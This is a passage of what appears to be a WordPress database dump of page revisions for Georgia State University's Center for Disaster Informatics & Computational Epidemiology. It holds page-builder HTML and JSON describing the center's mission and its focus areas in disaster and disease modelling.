d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:26:09','2022-02-16 18:26:09','',22,'https://gsudice.dataconn.net/?p=384',0,'revision','',0),(388,1,'2022-02-16 18:28:59','2022-02-16 18:28:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c17\",\"index\":0,\"id\":\"122-c18\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c15\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c21\",\"parentId\":\"122-c20\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c20\",\"parentId\":\"122-c19\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c15\",\"index\":0,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c15\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-02-16 18:28:59','2022-02-16 18:28:59','',353,'https://gsudice.dataconn.net/?p=388',0,'revision','',0),(389,1,'2022-02-16 18:28:59','2022-02-16 18:28:59','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c5\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c6\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c13\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c15\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c15 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c16\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c16 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c17-outer\">\n <div data-colibri-id=\"122-c17\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c17 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c18\" class=\"h-global-transition-all h-heading style-324 style-local-122-c18 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c18\">\n <!---->\n <!---->\n <h3 class=\"\">Our Mission</h3>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c19\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c19 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c20-outer\">\n <div data-colibri-id=\"122-c20\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-319 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 18:28:59','2022-02-16 18:28:59','',122,'https://gsudice.dataconn.net/?p=389',0,'revision','',0),(395,1,'2022-02-16 18:34:57','2022-02-16 18:34:57','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c24\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c24\",\"index\":0,\"id\":\"20-c25\",\"partialId\":20,\"styleRef\":330,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas\"}}],\"styleRef\":329,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:34:57','2022-02-16 18:34:57','',168,'https://gsudice.dataconn.net/?p=395',0,'revision','',0),(396,1,'2022-02-16 18:34:57','2022-02-16 18:34:57','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" 